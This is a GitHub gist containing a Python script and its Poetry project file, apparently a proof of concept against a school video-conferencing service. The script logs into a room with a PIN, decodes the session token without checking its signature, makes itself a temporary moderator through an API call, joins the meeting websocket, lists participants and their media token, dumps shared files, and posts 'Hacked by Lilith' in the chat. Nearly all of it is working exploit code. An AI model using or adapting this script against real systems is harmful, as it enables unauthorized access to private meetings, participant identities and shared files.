-
-
Save LilithWittmann/1002df3a0a08d595c22f5eac1836f844 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import uuid | |
from urllib.parse import urlparse | |
from websocket import create_connection | |
import json | |
import jwt | |
import sys | |
def get_jwt(authority_server='',room_id="", username="abc", user_session_id="", pin="0"): | |
"""create a new session""" | |
headers = { | |
"accept": "*/*", | |
'authority': authority_server, | |
"accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7", | |
"content-type": "multipart/form-data; boundary=----WebKitFormBoundary5J7BrPSBB3hM3R9A", | |
"sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"", | |
"sec-ch-ua-mobile": "?0", | |
"sec-fetch-dest": "empty", | |
"sec-fetch-mode": "cors", | |
"sec-fetch-site": "cross-site", | |
"sec-gpc": "1" | |
} | |
data = f"------WebKitFormBoundary5J7BrPSBB3hM3R9A\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n{username}\r\n------WebKitFormBoundary5J7BrPSBB3hM3R9A--\r\n" | |
response = requests.post(f"https://{authority_server}/api/fsm/admin/{room_id}/login/{user_session_id}/{pin}", headers=headers, data=data) | |
return response.text | |
def get_video_config(room_id): | |
headers = { | |
'Connection': 'keep-alive', | |
'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', | |
'sec-ch-ua-mobile': '?0', | |
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', | |
'content-type': 'application/json', | |
'Accept': '*/*', | |
'Sec-Fetch-Site': 'same-origin', | |
'Sec-Fetch-Mode': 'cors', | |
'Sec-Fetch-Dest': 'empty', | |
'Referer': f'https://viko.bycs.de/app/raum/{room_id}', | |
'Accept-Language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7', | |
'dnt': '1', | |
'sec-gpc': '1', | |
} | |
response = requests.get(f'https://viko.bycs.de/api/gateway/room/{room_id}/status/video', headers=headers) | |
return response.json() | |
def get_files_shared(authority_server='', room_id=None, jwt=None): | |
headers = { | |
'authority': authority_server, | |
'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', | |
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', | |
'sec-ch-ua-mobile': '?0', | |
'authorization': 'Bearer '+jwt, | |
'accept': '*/*', | |
'origin': 'https://viko.bycs.de', | |
'sec-fetch-site': 'cross-site', | |
'sec-fetch-mode': 'cors', | |
'sec-fetch-dest': 'empty', | |
'referer': 'https://viko.bycs.de/', | |
'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7', | |
'dnt': '1', | |
'sec-gpc': '1', | |
} | |
response = requests.get(f"https://{authority_server}/api/fsm/room/{room_id}/file", headers=headers) | |
return response.json() | |
def make_mod(authority_server='', jwt="", room_id="", user_id=""): | |
headers = { | |
'authority': authority_server, | |
'content-length': '0', | |
'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', | |
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', | |
'sec-ch-ua-mobile': '?0', | |
'authorization': 'Bearer '+jwt, | |
'accept': '*/*', | |
'origin': 'https://viko.bycs.de', | |
'sec-fetch-site': 'cross-site', | |
'sec-fetch-mode': 'cors', | |
'sec-fetch-dest': 'empty', | |
'referer': 'https://viko.bycs.de/', | |
'accept-language': 'en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7', | |
'dnt': '1', | |
'sec-gpc': '1', | |
} | |
response = requests.post(f"https://{authority_server}/api/fsm/room/{room_id}/config/tempModerator/{user_id}/true", headers=headers) | |
return response.text | |
# set the user that should try to join | |
ROOM_ID = sys.argv[1] | |
PIN = sys.argv[2] | |
USERNAME = "evil_Hacker" | |
# get the viko config | |
video_config = get_video_config(ROOM_ID) | |
print(video_config) | |
parsed_uri = urlparse(video_config["fsm"]) | |
# parse the active server | |
server = parsed_uri.netloc | |
# generate random session | |
session_user_id = uuid.uuid4() | |
# get the current jwt | |
print("Our JWT:") | |
jwt_token = get_jwt(server,ROOM_ID, USERNAME, str(session_user_id), PIN) | |
print(jwt_token) | |
# extract the user id out of our jwt | |
decoded_jwt = jwt.decode(jwt_token, options={"verify_signature": False}, algorithms=["HS512"]) | |
print(decoded_jwt) | |
ws_connection_id = decoded_jwt["jti"] | |
# make moderator | |
print(make_mod(server, jwt_token, ROOM_ID, ws_connection_id)) | |
# create ws connection to the visavid websocket (not janus…) | |
con = create_connection(f"wss://{server}/websockets/{ROOM_ID}/{ws_connection_id}") | |
# authenticate as a user in the meeting room | |
con.send('{"type":"auth","name":"'+USERNAME+'","userId":"'+ws_connection_id+'","token":"'+jwt_token+'","sessionId":"'+str(uuid.uuid4())+'","t":"'+str(uuid.uuid4())+'","anon":false}') | |
print(con.recv()) | |
# get list of participants | |
con.send('{"request":"participants"}') | |
participants = con.recv() | |
participants = json.loads(participants) | |
# extract Janus Token | |
print(f"\nYour Janus Token is: {participants['token']} \n") | |
# extract user currently in the room | |
print(f"Users in the room:") | |
for u in participants["users"]: | |
print(f"User:{u['name']} ({u['id']}) ") | |
print("\n-----------\n") | |
print("Dump: ") | |
print(participants) | |
print("\n-----------\n") | |
print("Files shared: ") | |
print(get_files_shared(authority_server=server, room_id=ROOM_ID, jwt=jwt_token)) | |
con.send('{"request":"chatMessage","text":"Hacked by Lilith"}') | |
print(con.recv()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[tool.poetry] | |
name = "csuhack" | |
version = "0.1.0" | |
description = "" | |
authors = ["Lilith Wittmann <mail@lilithwittmann.de>"] | |
[tool.poetry.dependencies] | |
python = "^3.7" | |
requests = "^2.25.1" | |
websocket = "^0.2.1" | |
websocket-client = "^1.1.0" | |
PyJWT = "^2.1.0" | |
[tool.poetry.dev-dependencies] | |
[build-system] | |
requires = ["poetry-core>=1.0.0"] | |
build-backend = "poetry.core.masonry.api" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment